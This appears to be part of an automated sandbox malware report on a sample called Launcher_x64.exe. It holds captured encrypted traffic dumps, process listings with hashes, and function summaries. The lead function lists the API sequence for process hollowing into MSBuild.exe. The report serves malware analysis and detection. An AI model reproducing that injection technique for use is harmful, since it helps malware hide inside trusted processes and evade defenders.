{"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=T9yDly%2Bf5UJcpV%2Bh%2FHVhHZ1mNRhRXJLa9pCv2pwXnoD8DKKwkcDtUrpexDgO%2F2LtUf9Afsf8CgEgbQbngeRacCkxyn3U39McHDwW4fhktfTcmZ1j%2BOGfWlPlabneU9NZ1Jxz1lg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8fabb1c98caa4234-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1672&min_rtt=1662&rtt_var=643&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2846&recv_bytes=991&delivery_rate=1675272&cwnd=172&unsent_bytes=0&cid=aedd9280a9c2d9c9&ts=786&x=0"
2024-12-31 16:37:29 UTC	238	IN	Data Raw: 33 36 37 63 0d 0a 66 6c 38 64 6a 32 32 79 70 35 58 34 66 68 72 41 4f 58 4d 68 68 69 74 35 42 41 61 37 59 32 2f 50 65 41 4c 57 65 63 52 35 53 61 59 6c 4a 44 2f 70 47 5a 43 64 70 4e 52 63 66 2b 49 44 51 67 32 6b 54 31 73 2b 4a 49 49 70 42 59 30 4e 62 61 55 66 6f 52 45 4e 6c 7a 52 72 4c 65 41 76 33 63 6e 79 76 52 70 77 71 77 30 38 55 4d 4a 44 54 56 78 69 6a 52 63 44 2f 6b 78 34 68 44 47 38 51 44 79 54 43 53 31 77 75 51 54 61 6e 71 4f 39 4c 6c 2b 75 55 79 42 47 77 55 49 63 52 56 53 4a 4c 44 75 6f 54 6d 32 5a 4d 61 77 64 65 39 64 4d 42 30 58 6c 49 2f 66 42 33 63 6f 69 4e 5a 4e 67 42 45 50 33 5a 7a 45 33 61 65 70 61 50 4b 6f 32 53 5a 63 59 6a 6b 30 4c 37 69 64 71 55 73 73 63 31 5a 50 77 76 6b 31 2f 73 6d 4d 58 Data Ascii: 367cfl8dj22yp5X4fhrAOXMhhit5BAa7Y2/PeALWecR5SaYlJD/pGZCdpNRcf+IDQg2kT1s+JIIpBY0NbaUfoRENlzRrLeAv3cnyvRpwqw08UMJDTVxijRcD/kx4hDG8QDyTCS1wuQTanqO9Ll+uUyBGwUIcRVSJLDuoTm2ZMawde9dMB0XlI/fB3coiNZNgBEP3ZzE3aepaPKo2SZcYjk0L7idqUssc1ZPwvk1/smMX
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 52 4d 68 6d 4b 7a 78 67 32 55 67 41 71 30 39 32 6e 77 79 32 47 6e 43 56 4b 7a 45 70 39 77 62 4c 6b 66 7a 49 47 33 69 48 59 51 52 72 39 46 4e 50 53 30 33 4e 43 6c 69 64 4c 6d 57 51 4c 4c 51 49 4b 2f 55 2f 4b 6c 62 66 43 38 4f 56 70 61 67 59 62 70 5a 32 52 31 62 75 61 41 46 32 53 38 4d 58 4e 72 6f 39 61 4f 42 4c 72 68 45 74 6c 45 67 78 56 64 63 48 31 2b 4c 33 76 45 77 69 68 45 34 43 52 62 52 6e 4d 54 64 70 36 6c 6f 38 71 6a 5a 4a 6d 52 69 4f 54 53 50 69 4b 6d 70 34 75 42 7a 56 6b 76 43 2b 54 58 2b 79 62 52 64 45 79 78 73 72 50 47 44 5a 57 69 61 6c 4f 6e 65 35 43 70 51 63 49 65 4a 50 46 53 6d 2f 41 76 44 49 2b 35 38 2f 66 71 6f 4a 52 32 37 33 62 78 46 64 58 74 39 55 49 61 4e 4a 4e 71 77 72 6a 41 46 77 30 41 63 79 55 4d 68 62 32 39 2b 73 7a 6a 74 4b 6c 67 6f Data Ascii: RMhmKzxg2UgAq092nwy2GnCVKzEp9wbLkfzIG3iHYQRr9FNPS03NClidLmWQLLQIK/U/KlbfC8OVpagYbpZ2R1buaAF2S8MXNro9aOBLrhEtlEgxVdcH1+L3vEwihE4CRbRnMTdp6lo8qjZJmRiOTSPiKmp4uBzVkvC+TX+ybRdEyxsrPGDZWialOne5CpQcIeJPFSm/AvDI+58/fqoJR273bxFdXt9UIaNJNqwrjAFw0AcyUMhb29+szjtKlgo
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 67 74 65 59 74 34 75 58 35 31 41 5a 4c 52 41 6a 68 4d 4c 30 78 45 73 65 2b 6f 46 39 70 62 66 7a 45 35 31 67 6c 59 64 52 73 4e 50 45 32 38 79 39 42 49 72 70 30 78 61 73 6b 2b 77 46 58 69 53 42 41 31 56 39 31 54 45 6c 2f 69 31 4f 53 79 70 51 55 6f 58 77 33 73 73 61 6d 7a 6f 42 43 69 6d 48 55 4f 45 53 34 73 74 4c 70 41 52 45 46 58 6e 43 59 48 57 70 36 41 6d 63 49 35 38 46 57 6d 30 64 31 5a 58 58 38 77 42 48 6f 4d 77 4d 62 6b 6f 2f 53 6f 73 36 44 55 65 66 4d 56 5a 38 4f 2f 4d 7a 54 46 65 73 56 35 48 52 4d 41 59 48 48 5a 63 33 77 59 69 2f 79 6f 36 73 42 76 39 4d 79 50 6b 43 7a 42 75 36 51 6a 61 34 36 53 79 53 69 71 76 65 78 78 50 34 57 34 64 62 6d 32 50 4c 42 36 4c 45 44 61 4f 48 66 49 4e 4a 5a 64 4b 4a 55 2f 48 46 59 76 52 70 5a 55 7a 58 66 5a 51 43 78 69 77 Data Ascii: gteYt4uX51AZLRAjhML0xEse+oF9pbfzE51glYdRsNPE28y9BIrp0xask+wFXiSBA1V91TEl/i1OSypQUoXw3ssamzoBCimHUOES4stLpAREFXnCYHWp6AmcI58FWm0d1ZXX8wBHoMwMbko/Sos6DUefMVZ8O/MzTFesV5HRMAYHHZc3wYi/yo6sBv9MyPkCzBu6Qja46SySiqvexxP4W4dbm2PLB6LEDaOHfINJZdKJU/HFYvRpZUzXfZQCxiw
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 4f 43 46 67 36 67 48 55 54 6c 4c 71 38 53 42 74 59 63 62 47 66 6f 47 73 76 58 70 35 74 56 53 4b 4a 37 41 58 6e 75 65 56 4a 6e 4d 4e 41 45 44 49 51 65 64 4b 59 4a 6e 52 67 72 78 77 6f 4c 57 65 4d 33 31 2b 4c 68 74 6b 68 44 6b 58 5a 48 62 73 56 35 54 44 5a 65 6a 78 6b 34 68 51 46 42 6c 51 2b 31 46 54 6e 6f 47 47 70 35 34 6a 33 6a 39 61 66 49 42 48 75 59 53 42 64 49 36 6e 64 57 66 45 7a 55 44 41 79 41 4a 43 32 53 4e 35 49 4c 48 2b 38 74 47 48 62 47 57 49 48 6d 38 35 77 48 4b 37 6b 49 4c 77 37 74 62 68 5a 6c 4d 2b 6b 74 58 59 49 72 62 34 38 65 6a 44 41 62 39 78 4d 32 63 4d 74 63 67 4f 4b 68 73 52 6f 6f 69 46 73 48 63 4f 68 54 45 55 73 2b 38 41 30 6e 6e 79 41 70 6a 69 4f 32 4b 51 66 4d 4b 32 74 4e 2f 51 47 47 77 73 57 43 53 33 6d 69 51 55 64 62 31 47 4d 42 50 Data Ascii: OCFg6gHUTlLq8SBtYcbGfoGsvXp5tVSKJ7AXnueVJnMNAEDIQedKYJnRgrxwoLWeM31+LhtkhDkXZHbsV5TDZejxk4hQFBlQ+1FTnoGGp54j3j9afIBHuYSBdI6ndWfEzUDAyAJC2SN5ILH+8tGHbGWIHm85wHK7kILw7tbhZlM+ktXYIrb48ejDAb9xM2cMtcgOKhsRooiFsHcOhTEUs+8A0nnyApjiO2KQfMK2tN/QGGwsWCS3miQUdb1GMBP
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 41 72 43 68 34 34 69 69 49 55 68 6e 52 50 42 64 55 36 41 47 45 37 76 4b 50 42 45 44 72 58 45 5a 77 39 41 41 4f 64 6b 65 44 42 51 33 6b 41 56 37 35 50 66 63 34 66 73 41 61 42 55 7a 34 4a 39 32 58 2b 70 41 72 62 4b 6c 58 50 32 50 6b 53 69 6f 30 52 2b 67 6f 4f 50 67 5a 55 59 51 50 38 7a 45 73 2b 6c 45 4e 58 2f 31 66 39 50 37 32 76 6a 39 76 73 67 78 41 52 64 42 70 50 58 42 48 32 41 73 65 6e 79 51 74 6f 41 33 30 4b 52 4f 65 50 52 6c 30 2f 77 72 4c 6c 76 2b 35 42 48 43 46 63 52 30 54 72 58 67 68 62 45 37 77 4a 68 36 4b 44 44 43 31 4e 34 78 4e 4a 2b 38 77 44 43 71 36 4f 76 2b 51 32 72 77 50 58 72 4e 74 52 6e 66 4e 48 45 42 69 55 4e 55 61 47 6f 73 66 61 59 49 59 6a 44 73 38 79 51 73 34 65 76 70 56 2b 5a 58 52 71 42 73 78 6d 47 41 56 43 76 56 38 4f 6d 78 70 77 51 Data Ascii: ArCh44iiIUhnRPBdU6AGE7vKPBEDrXEZw9AAOdkeDBQ3kAV75Pfc4fsAaBUz4J92X+pArbKlXP2PkSio0R+goOPgZUYQP8zEs+lENX/1f9P72vj9vsgxARdBpPXBH2AsenyQtoA30KROePRl0/wrLlv+5BHCFcR0TrXghbE7wJh6KDDC1N4xNJ+8wDCq6Ov+Q2rwPXrNtRnfNHEBiUNUaGosfaYIYjDs8yQs4evpV+ZXRqBsxmGAVCvV8OmxpwQ
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 4e 35 77 34 74 78 73 49 35 53 73 63 4b 4e 4e 43 33 4e 65 69 67 52 6c 4b 75 6b 38 62 45 38 34 64 44 6d 6c 42 77 31 73 35 6a 44 4a 7a 6d 45 36 68 43 77 50 6a 56 53 68 76 7a 6c 58 55 78 66 36 51 43 79 4f 72 59 42 68 48 76 78 68 4b 4e 31 50 56 43 68 33 6b 51 54 43 44 4e 6f 73 53 49 73 34 52 4a 58 47 37 43 4f 4c 64 6f 4a 73 63 59 76 52 44 49 57 6e 2b 45 67 78 58 51 59 78 52 56 2f 77 41 58 76 6c 4b 6b 53 6b 74 39 52 73 55 53 4d 51 64 68 65 58 53 6b 53 39 69 73 51 35 48 62 73 35 70 45 57 70 72 30 53 41 4f 2f 6b 74 4d 73 53 58 72 4d 77 6a 56 48 42 31 2f 31 69 4b 42 6c 4d 4b 56 56 55 75 4e 43 6a 68 77 35 32 46 4e 52 6a 44 59 4c 54 69 68 55 33 4c 69 45 34 55 7a 48 75 73 57 4d 56 66 58 4a 73 66 6a 2f 61 45 77 54 5a 70 77 45 45 7a 4d 55 52 46 4c 50 76 41 52 49 59 6f Data Ascii: N5w4txsI5SscKNNC3NeigRlKuk8bE84dDmlBw1s5jDJzmE6hCwPjVShvzlXUxf6QCyOrYBhHvxhKN1PVCh3kQTCDNosSIs4RJXG7COLdoJscYvRDIWn+EgxXQYxRV/wAXvlKkSkt9RsUSMQdheXSkS9isQ5Hbs5pEWpr0SAO/ktMsSXrMwjVHB1/1iKBlMKVVUuNCjhw52FNRjDYLTihU3LiE4UzHusWMVfXJsfj/aEwTZpwEEzMURFLPvARIYo
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 4c 51 6c 5a 73 4e 48 4e 6e 44 2b 56 59 44 37 75 71 45 53 56 4b 6c 2f 4d 47 4c 66 62 55 74 58 54 73 45 58 43 70 30 50 4b 66 30 54 6f 7a 4d 43 35 78 38 56 4b 63 30 71 6d 66 33 74 6c 69 51 6a 39 51 73 34 51 50 64 2f 47 7a 31 76 37 6c 45 6d 6d 6a 46 52 73 53 47 64 46 6a 72 4a 45 54 6c 34 34 51 2b 45 36 4e 53 54 45 56 69 76 56 78 52 6b 30 48 77 49 64 45 48 64 42 77 65 62 4a 43 33 75 54 37 41 56 65 4f 55 36 62 6c 53 39 49 38 61 55 77 73 41 75 62 5a 77 57 51 6e 65 33 57 30 45 79 64 34 38 57 43 36 67 37 61 75 59 67 74 52 34 35 30 68 59 4c 5a 2b 63 76 32 2b 50 69 69 52 4e 59 70 30 41 45 46 2f 77 41 53 6d 42 6f 30 52 42 57 6e 6b 46 46 6d 45 76 76 45 79 37 73 4e 52 35 38 78 56 6e 77 34 66 65 2f 53 6d 4f 6c 55 44 4a 7a 78 58 6f 57 66 47 66 53 46 51 4f 49 45 47 4f 51 Data Ascii: LQlZsNHNnD+VYD7uqESVKl/MGLfbUtXTsEXCp0PKf0TozMC5x8VKc0qmf3tliQj9Qs4QPd/Gz1v7lEmmjFRsSGdFjrJETl44Q+E6NSTEVivVxRk0HwIdEHdBwebJC3uT7AVeOU6blS9I8aUwsAubZwWQne3W0Eyd48WC6g7auYgtR450hYLZ+cv2+PiiRNYp0AEF/wASmBo0RBWnkFFmEvvEy7sNR58xVnw4fe/SmOlUDJzxXoWfGfSFQOIEGOQ
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 44 55 48 52 78 38 35 53 44 32 6e 36 58 4c 4f 56 4f 42 51 51 56 51 74 48 4d 76 63 55 76 2b 44 55 53 4d 4a 43 32 6c 48 4b 45 4c 4f 4f 6f 32 41 7a 4c 54 51 75 69 4d 35 4c 55 39 55 5a 46 59 4f 55 50 53 47 43 35 31 55 63 34 57 48 2f 6f 4c 53 2b 49 63 6a 79 35 77 7a 68 45 6f 54 73 6f 34 67 70 37 66 6b 6a 78 78 38 41 73 51 53 63 64 76 54 33 52 52 30 41 77 74 6f 42 5a 51 72 78 57 33 48 58 48 73 46 32 64 5a 35 46 54 6e 37 73 4f 4a 4b 56 2f 33 43 78 56 73 78 33 73 2f 55 57 66 64 41 46 69 58 45 32 47 47 44 36 74 4e 43 76 55 5a 47 48 54 71 4c 4f 43 57 79 64 63 74 63 66 55 4b 4f 47 6a 71 59 52 64 6f 54 65 73 36 42 72 63 77 4e 6f 59 4c 72 41 77 68 34 77 77 4b 54 63 52 65 77 66 61 73 6d 55 74 35 38 30 6f 57 5a 37 45 65 4c 31 51 7a 39 43 63 65 6a 42 4e 70 6b 54 61 38 49 Data Ascii: DUHRx85SD2n6XLOVOBQQVQtHMvcUv+DUSMJC2lHKELOOo2AzLTQuiM5LU9UZFYOUPSGC51Uc4WH/oLS+Icjy5wzhEoTso4gp7fkjxx8AsQScdvT3RR0AwtoBZQrxW3HXHsF2dZ5FTn7sOJKV/3CxVsx3s/UWfdAFiXE2GGD6tNCvUZGHTqLOCWydctcfUKOGjqYRdoTes6BrcwNoYLrAwh4wwKTcRewfasmUt580oWZ7EeL1Qz9CcejBNpkTa8I
2024-12-31 16:37:29 UTC	1369	IN	Data Raw: 75 4b 2f 59 46 69 2b 72 51 73 55 5a 30 39 55 41 62 56 65 39 4f 4f 46 5a 79 39 44 41 36 2b 51 31 42 6e 67 32 4b 53 79 75 55 4c 77 39 33 7a 56 33 55 33 71 66 41 54 45 4f 30 57 77 49 56 7a 6c 4d 4b 56 57 72 34 42 56 61 45 4d 45 47 63 46 49 59 2b 46 59 6c 4c 46 6b 33 2b 56 66 76 42 2f 4d 73 61 4b 5a 70 78 42 6d 7a 45 65 55 39 6d 5a 4e 77 35 42 76 67 4e 64 2b 59 66 67 53 73 4e 35 54 52 30 55 4f 41 4f 68 73 6e 41 76 52 74 77 71 31 55 57 55 2f 35 44 55 6e 4a 69 30 52 63 45 69 6b 78 31 6a 44 47 79 51 44 7a 67 45 78 51 32 75 55 62 4b 6e 71 4f 4b 42 6a 47 51 64 77 46 48 39 42 77 66 4e 45 4b 4b 41 69 65 35 45 6e 69 76 47 34 38 77 59 73 55 47 48 6d 6e 6e 48 2b 58 4c 6f 35 73 52 4b 36 63 4f 49 6b 50 76 66 69 78 74 66 76 30 75 47 6f 77 4c 52 34 5a 4d 38 42 30 61 77 51 Data Ascii: uK/YFi+rQsUZ09UAbVe9OOFZy9DA6+Q1Bng2KSyuULw93zV3U3qfATEO0WwIVzlMKVWr4BVaEMEGcFIY+FYlLFk3+VfvB/MsaKZpxBmzEeU9mZNw5BvgNd+YfgSsN5TR0UOAOhsnAvRtwq1UWU/5DUnJi0RcEikx1jDGyQDzgExQ2uUbKnqOKBjGQdwFH9BwfNEKKAie5EnivG48wYsUGHmnnH+XLo5sRK6cOIkPvfixtfv0uGowLR4ZM8B0awQ

Target ID:	0
Start time:	11:37:08
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase:	0xd60000
File size:	825'856 bytes
MD5 hash:	741EE77540764D0C3EAB3F6FA16F5F37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	11:37:08
Start date:	31/12/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	11:37:08
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase:	0xd60000
File size:	825'856 bytes
MD5 hash:	741EE77540764D0C3EAB3F6FA16F5F37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	11:37:08
Start date:	31/12/2024
Path:	C:\Users\user\Desktop\Launcher_x64.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\Launcher_x64.exe"
Imagebase:	0xd60000
File size:	825'856 bytes
MD5 hash:	741EE77540764D0C3EAB3F6FA16F5F37
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	7.3%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	1.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	37

Executed Functions

Function 00D9019E Relevance: 44.0, APIs: 11, Strings: 14, Instructions: 295
threadinjectionmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(?,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00D90110,00D90100), ref: 00D90334
VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 00D90347
Wow64GetThreadContext.KERNEL32(0000022C,00000000), ref: 00D90365
ReadProcessMemory.KERNELBASE(0000009C,?,00D90154,00000004,00000000), ref: 00D90389
VirtualAllocEx.KERNELBASE(0000009C,?,?,00003000,00000040), ref: 00D903B4
TerminateProcess.KERNELBASE(0000009C,00000000), ref: 00D903D3
WriteProcessMemory.KERNELBASE(0000009C,00000000,?,?,00000000,?), ref: 00D9040C
WriteProcessMemory.KERNELBASE(0000009C,00400000,?,?,00000000,?,00000028), ref: 00D90457
WriteProcessMemory.KERNELBASE(0000009C,?,?,00000004,00000000), ref: 00D90495
Wow64SetThreadContext.KERNEL32(0000022C,02E50000), ref: 00D904D1
ResumeThread.KERNELBASE(0000022C), ref: 00D904E0

Strings

CreateProcessW, xrefs: 00D90250
VirtualAllocEx, xrefs: 00D9029C
WriteProcessMemory, xrefs: 00D902AF
SetThreadContext, xrefs: 00D902C2
TerminateProcess, xrefs: 00D903C3
Load, xrefs: 00D901DA
GetThreadContext, xrefs: 00D90276
ress, xrefs: 00D90226
ResumeThread, xrefs: 00D902D8
ReadProcessMemory, xrefs: 00D90289
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe, xrefs: 00D90333
VirtualAlloc, xrefs: 00D90263
aryA, xrefs: 00D901E2
GetP, xrefs: 00D9021E

Memory Dump Source

Source File: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: Process$Memory$ThreadWrite$AllocContextVirtualWow64$CreateReadResumeTerminate
String ID: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe$CreateProcessW$GetP$GetThreadContext$Load$ReadProcessMemory$ResumeThread$SetThreadContext$TerminateProcess$VirtualAlloc$VirtualAllocEx$WriteProcessMemory$aryA$ress
API String ID: 2440066154-3857624555
Opcode ID: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction ID: fa15d7f892c57236d14d70e7af91d412d3658f874760430750d9c317d4432ee1
Opcode Fuzzy Hash: 4d4c1a7e65f8d0d38951af6025ef960edc15c7aa7ffa2998c2434409f37e51df
Instruction Fuzzy Hash: 3BB1F87664064AAFDB60CF68CC80BDA77A5FF88714F158124EA0CAB341D774FA51CBA4

Function 00D61C10 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 108
libraryfileloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00D61C3B
CreateFileA.KERNELBASE ref: 00D61C94
GetFileSize.KERNEL32 ref: 00D61CC3
CloseHandle.KERNEL32 ref: 00D61CDF

Strings

CreateFileA, xrefs: 00D61C2E

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: File$AddressCloseCreateHandleProcSize
String ID: CreateFileA
API String ID: 2547132502-1429953656
Opcode ID: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
Instruction ID: 91d4f7fd6afe5d3ee9a9cae4db60e339a0621f2ccba58caf3f873401b70d58e1
Opcode Fuzzy Hash: 0bf27c55d3e56102971c61d26ac3a9174ae89d64dec7ab4c08b77edd9f442afb
Instruction Fuzzy Hash: 844194B4D083099FDB00EFA8D4586AEBBF0EF49314F048529E899A7350D7789545CFA2

Function 00D76642 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FreeLibrary.KERNEL32(00000000,?,00000000,00000800,00000000,00000000,?,BFBEED24,?,00D76751,00000000,00000000,00000000,00000000), ref: 00D76703

Strings

api-ms-, xrefs: 00D76699
ext-ms-, xrefs: 00D766AD

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: FreeLibrary
String ID: api-ms-$ext-ms-
API String ID: 3664257935-537541572
Opcode ID: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
Instruction ID: 8fea9fe6ccce4fed1752232999deaddf95b6b9aee658ad4e0435180fc54c4167
Opcode Fuzzy Hash: 06dbf40251e1e05748ae9434eb6b76d9ec3a5aabe61c25e758c4bc0d71940ebc
Instruction Fuzzy Hash: 26210276A01B25ABC732AB24DC44A5E3368EB417A0F694165FD09E7290FB70ED00DBF0

Function 00D620C0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32 ref: 00D620E6
GetProcAddress.KERNEL32 ref: 00D620FE
FreeConsole.KERNELBASE ref: 00D6210D

Strings

kernel32.dll, xrefs: 00D620DD
FreeConsole, xrefs: 00D620F1

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressConsoleFreeHandleModuleProc
String ID: FreeConsole$kernel32.dll
API String ID: 1635486814-2564406000
Opcode ID: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
Instruction ID: baff1fb42717a0f2906c4aba6ad6156d9f4b886ec8448bace1d34544f7acb431
Opcode Fuzzy Hash: 41eeb3a2837fc048ffea5526fb74a231e7d981a3d8609d9e8bb66cb909722715
Instruction Fuzzy Hash: 5B016670E14208AFCB40EFB8D94569DBBF4EB48300F41856AE849D7351EB34A6548FA2

Function 00D61DB0 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 78
librarymemoryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcAddress.KERNEL32 ref: 00D61E6E
VirtualProtect.KERNELBASE ref: 00D61EC3

Strings

VirtualProtect, xrefs: 00D61E61
@, xrefs: 00D61EB7

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668364933.0000000000D94000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668379699.0000000000D97000.00000008.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_d60000_Launcher_x64.jbxd

Similarity

API ID: AddressProcProtectVirtual
String ID: @$VirtualProtect
API String ID: 3759838892-29487290
Opcode ID: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
Instruction ID: 6d1644b195d191c98dce675188c1a3f6ab76d7e3ff1b16903b4e9541f81cf72f
Opcode Fuzzy Hash: 3fd6a0ec314ff19c5aeb65eeb08b8845c8a38c7ed2ab61ad3e9edb41d613fcb1
Instruction Fuzzy Hash: 2F41D1B4905309DFDB04DFA9E99869EBBF0FF48318F10841AE858AB350D7759984CFA1

Function 00D6F293 Relevance: 4.5, APIs: 3, Instructions: 15
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32(00D6F1A0,?,00D6F355,00000000,?,?,00D6F1A0,BFBEED24,?,00D6F1A0), ref: 00D6F2A4
TerminateProcess.KERNEL32(00000000,?,00D6F355,00000000,?,?,00D6F1A0,BFBEED24,?,00D6F1A0), ref: 00D6F2AB
ExitProcess.KERNEL32 ref: 00D6F2BD

Memory Dump Source

Source File: 00000000.00000002.1668287121.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true

Associated: 00000000.00000002.1668266269.0000000000D60000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668314183.0000000000D86000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668332843.0000000000D90000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1668348190.0000000000D91000.00000004.00000001.01000000.00000003.sdmpDownload File
